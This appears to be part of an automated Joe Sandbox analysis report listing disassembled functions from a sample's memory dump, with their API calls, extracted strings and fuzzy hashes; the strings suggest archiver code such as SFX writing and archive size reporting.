Opcode Fuzzy Hash: b057ee51dcd5607ac98d1341786f2a37433b1b22df7b31068b1c91dd7c1c68df
Instruction Fuzzy Hash: FAE0867D7403107B53009BA9AC59C77AE68F5E5662310466BF501D3351D5A548138A61

Uniqueness

Uniqueness Score: -1.00%

Function 009EE153 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 461COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009EE158
__aulldiv.LIBCMT ref: 009EE1B2
__aulldiv.LIBCMT ref: 009EE1BD

Strings

x, xrefs: 009EE343
x, xrefs: 009EE3A0

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: __aulldiv$H_prolog
String ID: x$x
API String ID: 2300968129-177600594
Opcode ID: 75fa34d40ffa5689d99d0bb3816709fa969d31e3e201f80bac034e2f2a73c2fb
Instruction ID: c30d18c73c2a03cecb2fd6aa55cac13a1aa470850607860f38aa5c8bb8924d6c
Opcode Fuzzy Hash: 75fa34d40ffa5689d99d0bb3816709fa969d31e3e201f80bac034e2f2a73c2fb
Instruction Fuzzy Hash: 80126971900249EFCF22DFA5C881AEDBBB9BF48314F248169F915AB2A1D7319D45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 009DCEE0 Relevance: 9.1, APIs: 6, Instructions: 95COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 009DCEF3
__aullrem.LIBCMT ref: 009DCF05
__aulldiv.LIBCMT ref: 009DCF22
__aulldiv.LIBCMT ref: 009DCF52
__aulldiv.LIBCMT ref: 009DCF74
__aulldiv.LIBCMT ref: 009DCF82

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: __aulldiv$__aullrem
String ID:
API String ID: 2022606265-0
Opcode ID: 6329fb3b4e3d8ef1cc918d8d491a6fa5370ad761711000448106eccc556a6304
Instruction ID: ef1116447a1d9495bb230ee048b44bf906c71642186ae8c28a0e6f3fcf18fbab
Opcode Fuzzy Hash: 6329fb3b4e3d8ef1cc918d8d491a6fa5370ad761711000448106eccc556a6304
Instruction Fuzzy Hash: 7F21A5B095021ABEDF10AF99DD41CDFBE6EEF417A4F20C226B524752A0D2714D60D761

Uniqueness

Uniqueness Score: -1.00%

Function 009D67B1 Relevance: 9.1, APIs: 6, Instructions: 74COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009D67B6

Part of subcall function 009D6581: FindClose.KERNELBASE(00000000,?,009D65B9), ref: 009D658C

SetLastError.KERNEL32(00000078,00000000,?,?), ref: 009D67DF
SetLastError.KERNEL32(00000000,00000000,?,?), ref: 009D67EB
FindFirstStreamW.KERNELBASE(?,00000000,-00000270,00000000), ref: 009D680C
GetLastError.KERNEL32(?,?), ref: 009D6819
FindFirstStreamW.KERNELBASE(?,00000000,-00000270,00000000), ref: 009D6855

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ErrorFindLast$FirstStream$CloseH_prolog
String ID:
API String ID: 1050961465-0
Opcode ID: e3e29b45a9e56068c115a1db467a9f310d342f763df2d2b7a43d6b9b85eeda45
Instruction ID: 63bde10564cb3a67275e3d5555823d2b0fa3a2e165f9af87b7228083b3953b77
Opcode Fuzzy Hash: e3e29b45a9e56068c115a1db467a9f310d342f763df2d2b7a43d6b9b85eeda45
Instruction Fuzzy Hash: BB21B035840205EFCB20EFA1D8899BE7B79FFD1361F10821AF89152391CB314986EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A0BA48 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00A0BB03

Part of subcall function 00A0B618: fputs.MSVCRT ref: 00A0B681

fputs.MSVCRT ref: 00A0BC84

Part of subcall function 009D1FDA: fflush.MSVCRT ref: 009D1FDC

fputs.MSVCRT ref: 00A0BBB6

Part of subcall function 009D1FE9: fputc.MSVCRT ref: 009D1FF0

Part of subcall function 009D1FFC: __EH_prolog.LIBCMT ref: 009D2001

Strings

ERRORS:, xrefs: 00A0BADC, 00A0BAFE
WARNINGS:, xrefs: 00A0BB8F, 00A0BBB1

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: fputs$H_prologfflushfputc
String ID: ERRORS:$WARNINGS:
API String ID: 1876658717-3472301450
Opcode ID: 79fcb007b119b6fe746a889766f67ca80065e6d9c37e8d398483bf529d51d78c
Instruction ID: cbd91da2705c3c017eb16a39072735e1132724685ff209c0f7ff80bd341eb135
Opcode Fuzzy Hash: 79fcb007b119b6fe746a889766f67ca80065e6d9c37e8d398483bf529d51d78c
Instruction Fuzzy Hash: C9712235600709EBDB24EF65E591FAAB7A6FF88300F04842EE85A473D1DB70AD44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 009D7638 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 157COMMON

Download Yara Rule

APIs

DeviceIoControl.KERNEL32(00000000,00074004,00000000,00000000,00000000,00000020,00000000,00000000), ref: 009D7682
DeviceIoControl.KERNEL32(00000002,000700A0,00000000,00000000,?,00000028,00000000,00000000), ref: 009D7725
DeviceIoControl.KERNEL32(00000002,00070000,00000000,00000000,00000000,00000018,00000000,00000000), ref: 009D7755
DeviceIoControl.KERNEL32(00000002,0002404C,00000000,00000000,00000000,00000018,00000000,00000000), ref: 009D7777

Part of subcall function 009D8F71: GetModuleHandleW.KERNEL32(kernel32.dll,GetDiskFreeSpaceExW,7622F5D0,00000002,00000000,?,?,?,?,?,?,009D76EF,009D1B1A,009D785D,?,00000002), ref: 009D8F8D
Part of subcall function 009D8F71: GetProcAddress.KERNEL32(00000000), ref: 009D8F94
Part of subcall function 009D8F71: GetDiskFreeSpaceW.KERNEL32(00000002,?,009D785D,009D76EF,009D1B1A,?,?,?,?,?,?,009D76EF,009D1B1A,009D785D,?,00000002), ref: 009D8FE4

Strings

:, xrefs: 009D76E0

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ControlDevice$AddressDiskFreeHandleModuleProcSpace
String ID: :
API String ID: 4250411929-336475711
Opcode ID: ef00d6104dd52199dfa588ec1ef8fa29b3114dbae0411450aafeb06fc74d5f1e
Instruction ID: 26aa33d4d2f7ab95ddaf9791a809bb310a3ac615296f301ff2d895990902bb92
Opcode Fuzzy Hash: ef00d6104dd52199dfa588ec1ef8fa29b3114dbae0411450aafeb06fc74d5f1e
Instruction Fuzzy Hash: 70518275948348AEDB21DFE4C841EEAFBFCEF18304F05C85AF599A7251E631A944CB60

Uniqueness

Uniqueness Score: -1.00%

Function 009D9C4F Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009D9C54

Part of subcall function 009D976D: RegCloseKey.ADVAPI32(?,?,009D9763), ref: 009D9779

Strings

HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 009D9CE1
x86, xrefs: 009D9C97
Previous Update Revision, xrefs: 009D9D20
Update Revision, xrefs: 009D9D27, 009D9D35

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: CloseH_prolog
String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$Previous Update Revision$Update Revision$x86
API String ID: 1579395594-270022386
Opcode ID: c135eedd507e51f1dc82a7016861e559e3ab9af4e18c0ac069c06aec3f4f2722
Instruction ID: a618df5be221fc0f81b9f39b0223e05bff33a43c18f43abbbdbed6f497aa7861
Opcode Fuzzy Hash: c135eedd507e51f1dc82a7016861e559e3ab9af4e18c0ac069c06aec3f4f2722
Instruction Fuzzy Hash: 5551A275E40209EFCB10EF94C992AEEB7B9BF98304F10882EE116A7391C7709D05CB50

Uniqueness

Uniqueness Score: -1.00%

Function 009D9A38 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 138COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009D9A3D

Part of subcall function 009D1E89: free.MSVCRT(?,009F6CD6,00000000,00000000,00000001,?,009D10EB), ref: 009D1E8D

Strings

act:, xrefs: 009D9B02
gran:, xrefs: 009D9B5A
page:, xrefs: 009D9B39
cpus:, xrefs: 009D9B1A

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prologfree
String ID: act:$ cpus:$ gran:$ page:
API String ID: 1978129608-454015223
Opcode ID: 4fbbf21271cf84aa11ade396945964dff87d47207d5cf51960b2485294febc55
Instruction ID: 5b50b15ec470fc0e8fe78d4a5093eb331326cfa1d1a3eb615d743611c5771047
Opcode Fuzzy Hash: 4fbbf21271cf84aa11ade396945964dff87d47207d5cf51960b2485294febc55
Instruction Fuzzy Hash: 6C41A172780300AADB287F649C5277E72A6ABD4704F11C93FB497A67D2CA789C488750

Uniqueness

Uniqueness Score: -1.00%

Function 009E19C3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E19C8

Part of subcall function 009D1AEA: __EH_prolog.LIBCMT ref: 009D1AEF
Part of subcall function 009D1AEA: GetLastError.KERNEL32(00000000,?,00000000,00000000), ref: 009D1B1E

_CxxThrowException.MSVCRT(00000001,00A51428), ref: 009E1A82

Part of subcall function 009D55C8: __EH_prolog.LIBCMT ref: 009D55CD

Part of subcall function 009D1E89: free.MSVCRT(?,009F6CD6,00000000,00000000,00000001,?,009D10EB), ref: 009D1E8D

Part of subcall function 009F0B88: __EH_prolog.LIBCMT ref: 009F0B8D

_CxxThrowException.MSVCRT(00000001,00A51428), ref: 009E1A65
_CxxThrowException.MSVCRT(00000001,00A51428), ref: 009E1AA9

Strings

The file operation error for listfile, xrefs: 009E1A12

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog$ExceptionThrow$ErrorLastfree
String ID: The file operation error for listfile
API String ID: 362913088-4247703111
Opcode ID: 4f66bd78d7e10c55bee04ccc9b80b5881237a3dbb26f8688f110b0843c20d2e0
Instruction ID: de14ee617054176117140c90edb0fbc03e680546e90991c09a2c6c9c0f5f5320
Opcode Fuzzy Hash: 4f66bd78d7e10c55bee04ccc9b80b5881237a3dbb26f8688f110b0843c20d2e0
Instruction Fuzzy Hash: 6C413A75D00159AFCF11EBE5D841AEEBBB9BF98700F10812AF91163251CB745A45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 009D599D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009D59A2
GetModuleHandleW.KERNEL32(kernel32.dll,CreateHardLinkW), ref: 009D59BC
GetProcAddress.KERNEL32(00000000), ref: 009D59C3

Strings

CreateHardLinkW, xrefs: 009D59AC
kernel32.dll, xrefs: 009D59B7

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: AddressH_prologHandleModuleProc
String ID: CreateHardLinkW$kernel32.dll
API String ID: 786088110-294928789
Opcode ID: 9e2032d510f786cc2a7730a22cdb7f784af7b2defc9d0fd8bb1a10a1db750977
Instruction ID: 8dedba64b2286e9c8c497121d9e1685065106cbaf9e18c6666334eb3fccd586f
Opcode Fuzzy Hash: 9e2032d510f786cc2a7730a22cdb7f784af7b2defc9d0fd8bb1a10a1db750977
Instruction Fuzzy Hash: DC21B176D90129AFCF15EBE4D946BEFBB79AF84740F118627E401B6391CA318D00CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A04CB5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00A5A878), ref: 00A04CC2
fputs.MSVCRT ref: 00A04D56
fputs.MSVCRT ref: 00A04D6F
LeaveCriticalSection.KERNEL32(00A5A878), ref: 00A04DB1

Strings

: , xrefs: 00A04D6A

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: CriticalSectionfputs$EnterLeave
String ID: :
API String ID: 3346953513-3653984579
Opcode ID: bc0d81651cb5fb2807ee68ce91cf358d8ed069422fdb2a980cc4fd2e67e33e35
Instruction ID: 141d4b1093bcd93648a7723de9e6bae6caf7cf421be248544010e24ec09940ff
Opcode Fuzzy Hash: bc0d81651cb5fb2807ee68ce91cf358d8ed069422fdb2a980cc4fd2e67e33e35
Instruction Fuzzy Hash: 8A318075901708EFD750EFA4E894EDAB7B4FF88315F10856EE95A4B2A1DB31A805CF20

Uniqueness

Uniqueness Score: -1.00%

Function 00A0C11E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 63COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A0C123
fputs.MSVCRT ref: 00A0C1E5

Part of subcall function 00A0B618: fputs.MSVCRT ref: 00A0B681

Strings

Files read from disk, xrefs: 00A0C167
Archive size: , xrefs: 00A0C184
Volumes: , xrefs: 00A0C1AF

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: fputs$H_prolog
String ID: Archive size: $Files read from disk$Volumes:
API String ID: 2614055831-73833580
Opcode ID: 806b59705dd2e6d49a4ce65e7aa44aaf5caed508cc56aa6c9e00e8b9fb73b6b4
Instruction ID: 6918ee72e8fb394553756b64795ded4523caa479a658965ea77029e1aa81f6a8
Opcode Fuzzy Hash: 806b59705dd2e6d49a4ce65e7aa44aaf5caed508cc56aa6c9e00e8b9fb73b6b4
Instruction Fuzzy Hash: 64219535800209EFCB14EFA4D843FEEBB75FF94300F00862AA206521E1DF71699ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A0A711 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A0A716
fputs.MSVCRT ref: 00A0A73F

Part of subcall function 009D55C8: __EH_prolog.LIBCMT ref: 009D55CD

Part of subcall function 009D1FFC: __EH_prolog.LIBCMT ref: 009D2001

Part of subcall function 009D1FE9: fputc.MSVCRT ref: 009D1FF0

Part of subcall function 009D1E89: free.MSVCRT(?,009F6CD6,00000000,00000000,00000001,?,009D10EB), ref: 009D1E8D

fputs.MSVCRT ref: 00A0A783

Strings

----------------, xrefs: 00A0A77E
: , xrefs: 00A0A73A

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog$fputs$fputcfree
String ID: : $----------------
API String ID: 1877784702-4071417161
Opcode ID: aa97ff5758544d46b3435661fb589a193f5d6b5356808a4e5e2a2427006e4fb3
Instruction ID: fe130a0042df538bf5f60d2d8974c0c810c7d79cb4e0f0efd7d6580dff264e71
Opcode Fuzzy Hash: aa97ff5758544d46b3435661fb589a193f5d6b5356808a4e5e2a2427006e4fb3
Instruction Fuzzy Hash: 1F019636644205EFCB15AFA8E846A5EBBB6FFC9350B10857EF016972E1CF71A8058B11

Uniqueness

Uniqueness Score: -1.00%

Function 00A0C247 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A0C24C
fputs.MSVCRT ref: 00A0C26F

Part of subcall function 009D1FFC: __EH_prolog.LIBCMT ref: 009D2001

fputs.MSVCRT ref: 00A0C2AB

Part of subcall function 009D1FE9: fputc.MSVCRT ref: 009D1FF0

Part of subcall function 009D1E89: free.MSVCRT(?,009F6CD6,00000000,00000000,00000001,?,009D10EB), ref: 009D1E8D

Strings

Write SFX: , xrefs: 00A0C26A
: , xrefs: 00A0C281

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prologfputs$fputcfree
String ID: : $Write SFX:
API String ID: 1941438168-2530961540
Opcode ID: f4029919c7784851395fae1a0adb6222ddf65cf38e000715df824ec7479e1d4b
Instruction ID: 7ab707f8275f1fae2b9e275d220d1cf8ae6af405def2bfedd1015da64a38706c
Opcode Fuzzy Hash: f4029919c7784851395fae1a0adb6222ddf65cf38e000715df824ec7479e1d4b
Instruction Fuzzy Hash: 7A018436514205AFCB05AFA4E802B9EBBB5FFC8310F10442AF505A21A1DF716954DB91

Uniqueness

Uniqueness Score: -1.00%

Function 009D99D7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 009D99F9

Part of subcall function 009D9A38: __EH_prolog.LIBCMT ref: 009D9A3D

GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 009D9A13
GetProcAddress.KERNEL32(00000000), ref: 009D9A1A

Strings

GetNativeSystemInfo, xrefs: 009D9A09
kernel32.dll, xrefs: 009D9A0E

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: AddressH_prologHandleInfoModuleProcSystem
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2024292667-192647395
Opcode ID: a1946e9c4e3799c2e1783cbe152f3095fc80490d46fa9638a639dca39f19c79c
Instruction ID: 0472d3db46f24cf5dfe77d9342153fe2e659f74b7c878185f5698b22658ac019
Opcode Fuzzy Hash: a1946e9c4e3799c2e1783cbe152f3095fc80490d46fa9638a639dca39f19c79c
Instruction Fuzzy Hash: 34F0967AA402455BCB01EBE8C849BDFB7ECAFD5312F058545E40197281DBB49915C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 009E7F47 Relevance: 8.0, APIs: 5, Instructions: 477COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E7F4C
memcpy.MSVCRT ref: 009E7FD0
memcpy.MSVCRT ref: 009E80EE
memcpy.MSVCRT ref: 009E8102
memset.MSVCRT ref: 009E830F

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: memcpy$H_prologmemset
String ID:
API String ID: 2371260246-0
Opcode ID: 5b0fea0f132f58850ad0c4ebc74b14a84529fa19cced964734a91841cc6b7494
Instruction ID: 328cba8b8b4731be0e1b09531adb8343aaba6596c7a35e2ffbe715dd4f3180c3
Opcode Fuzzy Hash: 5b0fea0f132f58850ad0c4ebc74b14a84529fa19cced964734a91841cc6b7494
Instruction Fuzzy Hash: DF128E71A00686DFDB21CFE5C884AAFB7B9BF48300F14886DE55ADB291DB35AD41CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00A363F0 Relevance: 7.8, APIs: 6, Instructions: 301COMMON

Download Yara Rule

APIs

Part of subcall function 00A37D90: WaitForSingleObject.KERNEL32(?,000000FF,009E9D84,?), ref: 00A37D93
Part of subcall function 00A37D90: GetLastError.KERNEL32(?,000000FF,009E9D84,?), ref: 00A37D9E

Part of subcall function 00A36CA0: EnterCriticalSection.KERNEL32(?,?,?,00A36439), ref: 00A36CA8
Part of subcall function 00A36CA0: LeaveCriticalSection.KERNEL32(?,?,?,00A36439), ref: 00A36CB2

EnterCriticalSection.KERNEL32(?), ref: 00A365FE
LeaveCriticalSection.KERNEL32(?), ref: 00A36618
EnterCriticalSection.KERNEL32(?), ref: 00A36682
LeaveCriticalSection.KERNEL32(?), ref: 00A366A8
EnterCriticalSection.KERNEL32(?), ref: 00A3670E
LeaveCriticalSection.KERNEL32(?), ref: 00A36746

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ErrorLastObjectSingleWait
String ID:
API String ID: 2116739831-0
Opcode ID: 6f7c7bdf4f667f0c68cd65fe9473786f768debb6b90e5a6d853ec93ce185a201
Instruction ID: 2677eeffd73663f8dc3da4e95711a19a43abef4771d339e302c98ca6d37cc4af
Opcode Fuzzy Hash: 6f7c7bdf4f667f0c68cd65fe9473786f768debb6b90e5a6d853ec93ce185a201
Instruction Fuzzy Hash: 14C158756047019FC724DF28D580BABB7E1FF88354F508A2DE8AA87351EB30E949CB51

Uniqueness

Uniqueness Score: -1.00%

Function 009D5E5B Relevance: 7.6, APIs: 5, Instructions: 150COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009D5E60

Part of subcall function 009D69AB: __EH_prolog.LIBCMT ref: 009D69B0

SetLastError.KERNEL32(0000010B,00000000,00000000), ref: 009D5EB6
GetLastError.KERNEL32(?,?,?,0000005C,?,00000000,00000000), ref: 009D5F8D
SetLastError.KERNEL32(?,?,?,?,?,0000005C,?,00000000,00000000), ref: 009D5FC8

Part of subcall function 009D5DB5: __EH_prolog.LIBCMT ref: 009D5DBA
